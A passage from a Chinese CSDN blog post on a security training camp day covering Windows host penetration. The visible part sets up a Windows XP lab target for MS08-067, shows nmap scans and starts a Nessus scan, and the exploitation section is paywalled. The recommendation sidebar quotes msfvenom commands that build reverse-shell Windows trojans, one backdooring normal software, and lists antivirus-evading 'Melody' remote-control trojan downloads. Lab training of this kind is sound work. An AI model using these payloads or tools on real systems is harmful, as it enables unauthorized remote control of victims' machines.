蓝盾实训营day5——windows主机渗透、kali-metasploit、melody木马

最新推荐文章于 2021-05-25 10:17:27 发布
最新推荐文章于 2021-05-25 10:17:27 发布
阅读量855 收藏 4
点赞数
分类专栏: 网络安全 蓝盾十天网络攻防实训营记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mingC0758/article/details/81025854
版权

目录

主机渗透

环境

  • windows xp sp2 (ms08_067漏洞利用)
  • kali linux 2.0(配置好Nessus环境)

目标扫描

nmap -sn 192.168.148.1/24   //扫局域网主机
nmap -O [target-ip] //扫描特定主机

扫描完成后,可以看到目标主机开放的端口号、mac地址、操作系统。

漏洞扫描

1、开启nessus服务:

service nessusd start

2、查看服务端口:

netstat -lntp | grep ness

这里写图片描述

2、然后用浏览器访问:

必须用https前缀来访问,可以在本地连接kali的这个网页。

https://localhost:8834/

3、启动一个new scan:

这里写图片描述

配置一下只扫描windows漏洞:
这里写图片描述

4、扫描结果

这里写图片描述

这里扫描出来一些以MS开头的漏洞,MS是微软的意思,是指由微软公司发布出来的漏洞,我们下面对MS08-067漏洞进行利用。

漏洞

最低0.47元/天 解锁文章
mingC0758
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WINDOWS系统下木马程序的设计与实现
秋雪的空间
02-17 5045
http://www.e-works.net.cn/ewk2004/ewkArticles/509/Article14881.htm引言 近年来,黑客攻击层出不穷,对网络安全构成了极大的威胁。木马是黑客的主要攻击手段之一,它通过渗透进入对方主机系统,从而实现对目标主机的远程操作,破坏力相当之大。 到目前为止,木马的发展已经历了五代: 第一代木马只是
windows内核木马
深度技术安全
02-25 1983
<br />1、Image Patches(映像补丁)<br />修改内核模块比如ntoskrnl.exe,ndis.sys,ntfs.sys等的代码段<br />1.1、函数前导Hook<br />Intel架构下,控制转移指令有三种,分别是2字节的寄存器操作,5字节的相对偏移操作和6字节的内存操作。当然,我们有两种方式来实现这种inline hook:<br />1)用Microsoft的detour库<br />2)用一个长度反汇编引擎,字节构建<br />我自己实现过一个动态HOOK引擎,在我的即将
MSF生成windows木马
热门推荐
lenkee的博客
10-22 1万+
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe 192.168.0.110是攻...
melody
abc1235454的博客
05-06 299
YellowStar is versatile. One day he writes a melody A = [A1, …, AN ], and he has a standard melody B = [B1, …, BN ]. YellowStar can split melody into several parts, it can be expressed as: K split pos...
Python-蓝盾bkci是一个开源的持续集成和持续交付系统
08-10
【Python-蓝盾bkci:开源的持续集成与持续交付系统】 蓝盾bk-ci,作为一个专为Python开发设计的开源持续集成(Continuous Integration, CI)和持续交付(Continuous Delivery, CD)系统,它旨在简化软件研发流程,...
蓝盾防火墙命令手册——很有用的
08-18
蓝盾防火墙的操作命令手册,希望对各位有用!
克鸿蓝盾杀毒 纯源码-易语言
06-11
克鸿和蓝盾引擎可能采用了不同的查杀技术,如启发式分析、行为分析、特征码匹配等,以识别和处理各种病毒、木马和恶意软件。了解这两个引擎的工作原理和实现方式,对于理解杀毒软件的开发至关重要。 3. **纯源码**...
蓝盾信息安全管理审计系统+S3000-SG2.doc
12-01
蓝盾信息安全管理审计系统+S3000-SG2 蓝盾信息安全管理审计系统+S3000-SG2 是一个综合性的信息安全管理系统,提供了多方面的安全保护和管理功能。以下是该系统的技术要求和功能特点: 网络接口和性能指标 * 网络...
国内领先的局域网管理软件-蓝盾-企业信息安全的保障.docx
11-28
蓝盾局域网管理软件是一款专门针对企业信息安全需求设计的高效解决方案,旨在加强企业内部的网络管理和监控,提升企业信息安全水平。以下将详细介绍该软件的主要功能及其对企业信息安全的重要作用。 一、基础框架与...
02-渗透基础--Windows基础篇.pdf
06-19
渗透技术-基础的windows操作篇,基本的黑客防范相关命令操作技术讲解
最新华中Melody远控
07-31
最新华中Melody远控 免杀
小颐专版Melody V1.2
01-26
小颐专版Melody V1.2.rar 远控抓鸡必备。
Melody1.2源码
10-31
非常给力,你懂的,我用了一段时间觉得还行发出来大家分享下
Melody1.2 免杀
10-01
Melody1.2 免杀
kail 生成window木马,软件加后门
a519395243的博客
01-22 931
1、kail 下命令行运行 msfvenom -p windows/meterpreter/reverse_tcp lhost=10.4.7.131 lport=4444 -f exe >shell.exe 或者 正常软件加后门(不影响正常软件的使用) msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.4.7.131 LPORT=4444 -b '\x00' -e x86/shik
windows渗透测试
Aluxian_的博客
05-25 9115
假设您是一名网络安全工程师,需要对某公司的公司进行黑盒测试,分析windows操作系统有什么漏洞并提出解决方案。 1.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试,并将该操作显示结果中8080端口对应的服务版本信息字符串作为Flag值提交; 使用nmap -sV -n 靶机IP flag:Microsoft IIS httpd 5.1 1.2. 通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透
Kali Linux:用永恒之蓝对 Windows 7 进行渗透并揭密勒索病毒攻击方法
GitChat
02-05 5693
提示:本文章内所有内容环境为自己搭建绝无违法内容,请不要利用其中的技术来做违法的事情。 声明:法律问题与本作者无关,请自觉遵守! 实施利用 Kali Linux 对 Windows7 SP1 进行永恒之蓝操作,所以操作将在虚拟机上完成。...
如何批量管理蓝盾硬盘还原
最新发布
05-11
如果您需要批量管理蓝盾硬盘还原,可以使用以下步骤: 1. 打开蓝盾硬盘还原软件,并选择“批量操作”选项。 2. 添加要还原的硬盘列表,并设置还原选项,如还原目标、还原方式等。 3. 点击“开始还原”按钮,等待硬盘还原完成。 在批量管理蓝盾硬盘还原时,需要注意以下事项: 1. 确认要还原的硬盘是否与蓝盾硬盘还原软件兼容。 2. 确认还原选项是否正确,以避免数据丢失或其他问题。 3. 确认硬盘还原完成后,进行测试以确保还原成功。 如果您对批量管理蓝盾硬盘还原不熟悉,建议先进行单个硬盘的还原测试,以确保操作正确无误。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值